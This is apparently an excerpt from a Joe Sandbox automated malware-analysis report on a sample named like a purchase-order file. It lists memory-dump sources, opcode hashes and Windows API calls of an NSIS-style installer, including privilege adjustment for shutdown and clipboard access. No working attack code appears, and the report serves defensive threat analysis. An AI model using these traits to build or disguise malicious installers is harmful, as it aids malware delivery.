                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f55668c97e80bd0d80d60e7c764df1cde374f7dd740df3ec2e23d2f1c9d9e94
                                                • Instruction ID: 5083c5b4123f50c330609142251edc87be379e67bda279e7faeb8eab444f9efe
                                                • Opcode Fuzzy Hash: 8f55668c97e80bd0d80d60e7c764df1cde374f7dd740df3ec2e23d2f1c9d9e94
                                                • Instruction Fuzzy Hash: 5601C8393003158FDB2656B8E52639AA7A6DBC2315F04487ED41ECF256DB25CC0F4B91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94fe127b6af9826fc17c2f0d88691b3ee93d7de9296d68f31c0c64fa2661b668
                                                • Instruction ID: b91c708e22dfe9c53ce589d769e5adf2399a5d539bf8009b414212cdaaf30d2e
                                                • Opcode Fuzzy Hash: 94fe127b6af9826fc17c2f0d88691b3ee93d7de9296d68f31c0c64fa2661b668
                                                • Instruction Fuzzy Hash: B8018134B101150FE710DA6ED868B5A73D9EB8A754F228439E50FEB380EEA1DC438785
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56499aa8893f19ed46f06de7fe6f486c961526db8108ef85bb32198a36c96734
                                                • Instruction ID: 930611b2bb78b442c850ef81921191666cadf2508d4f3a77133d7c632aacfffe
                                                • Opcode Fuzzy Hash: 56499aa8893f19ed46f06de7fe6f486c961526db8108ef85bb32198a36c96734
                                                • Instruction Fuzzy Hash: B6F024383002198BCB2566BDE52565EB6DADBC1315F00083ED41ECF314DF21DC0B4791
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ed7f6af7ba2abf68e110b20a71f3c2352f82c6e0f03a41dfd600e49a7f98ae5
                                                • Instruction ID: 15e5c28443df313ae6e8aba18dd7e74b96b4ee3cd3513e8ec2a842367cdadd2d
                                                • Opcode Fuzzy Hash: 4ed7f6af7ba2abf68e110b20a71f3c2352f82c6e0f03a41dfd600e49a7f98ae5
                                                • Instruction Fuzzy Hash: B1F0A036F2022897EB15AABADC0499AB73AF786394F114439ED01F7240DB71AC458BD1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 130d954ed9349dfb2edbdcbe781172330deb651bd30e37c0eb54ae13e769c0c3
                                                • Instruction ID: cfa80e99f1f1ea0e105b96d2b229aea549b20198f18e7a8506ef4c50bd9af898
                                                • Opcode Fuzzy Hash: 130d954ed9349dfb2edbdcbe781172330deb651bd30e37c0eb54ae13e769c0c3
                                                • Instruction Fuzzy Hash: CFE0D830D092C55FEB01CB758A096493FB49B02208F3144EAC804DB153D5B7CE51C342
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66179d5ec285e372ba1efe94b5c64b1fd562196bbd1ac59087b46bd6c11f1fe4
                                                • Instruction ID: b23ca6d080e2bd4a2cf45f543203c290af4a3a0a12c9af907080b8a07cebf935
                                                • Opcode Fuzzy Hash: 66179d5ec285e372ba1efe94b5c64b1fd562196bbd1ac59087b46bd6c11f1fe4
                                                • Instruction Fuzzy Hash: 75D05E30605B10CBC328D628E144A52B7DABB49715F954419F8678BA40CB60BD09CBC0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f3cd64b373423f08c400f43ced682a2f57df91656cf533f2cf81258b4af8a2a
                                                • Instruction ID: 0736cccccc6f827907037603d14f532b0b29b9d15a45f39c84aae8f684fd02cc
                                                • Opcode Fuzzy Hash: 1f3cd64b373423f08c400f43ced682a2f57df91656cf533f2cf81258b4af8a2a
                                                • Instruction Fuzzy Hash: 25D02B2050D3C08FD33BC33860482127FE51B59252F0A448EF4974F043CA141909C741
                                                APIs
                                                • SetErrorMode.KERNEL32 ref: 004033B2
                                                • GetVersion.KERNEL32 ref: 004033B8
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                • OleInitialize.OLE32(00000000), ref: 0040342F
                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                • GetTempPathW.KERNEL32(00000400,00441800,?,00000006,00000008,0000000A), ref: 004035D2
                                                • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                • lstrcatW.KERNEL32(00441800,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                • lstrcatW.KERNEL32(00441800,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000006,00000008,0000000A), ref: 00403624
                                                • DeleteFileW.KERNEL32(00441000,?,00000006,00000008,0000000A), ref: 00403638
                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                • ExitProcess.KERNEL32 ref: 00403724
                                                • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                • SetCurrentDirectoryW.KERNEL32(00441800,00441800,?,00000006,00000008,0000000A), ref: 00403779
                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                • CopyFileW.KERNEL32(00442800,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                • ExitProcess.KERNEL32 ref: 004038CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3441113951-3195845224
                                                • Opcode ID: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
                                                • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                • Opcode Fuzzy Hash: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
                                                • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                • DeleteObject.GDI32(00000000), ref: 00404D94
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                • GlobalFree.KERNEL32(?), ref: 004050CE
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                • ShowWindow.USER32(00000000), ref: 0040527F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
                                                • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                • Opcode Fuzzy Hash: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
                                                • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$605
                                                • API String ID: 0-141752050
                                                • Opcode ID: a2e1920d75f299cc32cd2fba16c9082f886e32cdec3479062943bd2169d6b2fa
                                                • Instruction ID: 343202f61c5e68e84a24a661bea065cf1e479b5f48c5e407944a34bbdac0be10
                                                • Opcode Fuzzy Hash: a2e1920d75f299cc32cd2fba16c9082f886e32cdec3479062943bd2169d6b2fa
                                                • Instruction Fuzzy Hash: DD123C34E00619CFDB14DF66D858A9DB7F2BF88304F218969D409AB364DB709D86CF91
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,00441800,74DF3420,00000000), ref: 004059F5
                                                • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,00441800,74DF3420,00000000), ref: 00405A3D
                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,00441800,74DF3420,00000000), ref: 00405A60
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,00441800,74DF3420,00000000), ref: 00405A66
                                                • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,00441800,74DF3420,00000000), ref: 00405A76
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                • FindClose.KERNEL32(00000000), ref: 00405B25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: \*.*
                                                • API String ID: 2035342205-1173974218
                                                • Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                • Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                • GetClientRect.USER32(?,?), ref: 0040550B
                                                • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                  • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                • ShowWindow.USER32(00000000), ref: 0040565A
                                                • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                • ShowWindow.USER32(00000008), ref: 004056A9
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                • CreatePopupMenu.USER32 ref: 004056EE
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                • GetWindowRect.USER32(?,?), ref: 00405722
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                • OpenClipboard.USER32(00000000), ref: 00405783
                                                • EmptyClipboard.USER32 ref: 00405789
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                • CloseClipboard.USER32 ref: 004057E4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
                                                • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                • Opcode Fuzzy Hash: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
                                                • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                • ShowWindow.USER32(?), ref: 00403DB1
                                                • DestroyWindow.USER32 ref: 00403DC5
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                • GetDlgItem.USER32(?,?), ref: 00403E02
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                • ShowWindow.USER32(00000000,?), ref: 00404007
                                                • EnableWindow.USER32(?,?), ref: 00404019
                                                • EnableWindow.USER32(?,?), ref: 00404034
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                • EnableMenuItem.USER32(00000000), ref: 00404051
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 184305955-0
                                                • Opcode ID: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
                                                • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                • Opcode Fuzzy Hash: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
                                                • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                APIs
                                                  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                • lstrcatW.KERNEL32(00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800,74DF3420,0043F000,00000000), ref: 00403A2B
                                                • lstrlenW.KERNEL32(00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800), ref: 00403AAB
                                                • lstrcmpiW.KERNEL32(00432E78,.exe,00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                • GetFileAttributesW.KERNEL32(00432E80), ref: 00403AC9
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403B12
                                                  • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-1115850852
                                                • Opcode ID: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
                                                • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                • Opcode Fuzzy Hash: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
                                                • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                • GetSysColor.USER32(?), ref: 004044D0
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                • lstrlenW.KERNEL32(?), ref: 004044F1
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                • SendMessageW.USER32(00000000), ref: 00404573
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                • SetCursor.USER32(00000000), ref: 004045F2
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                • SetCursor.USER32(00000000), ref: 0040460E
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
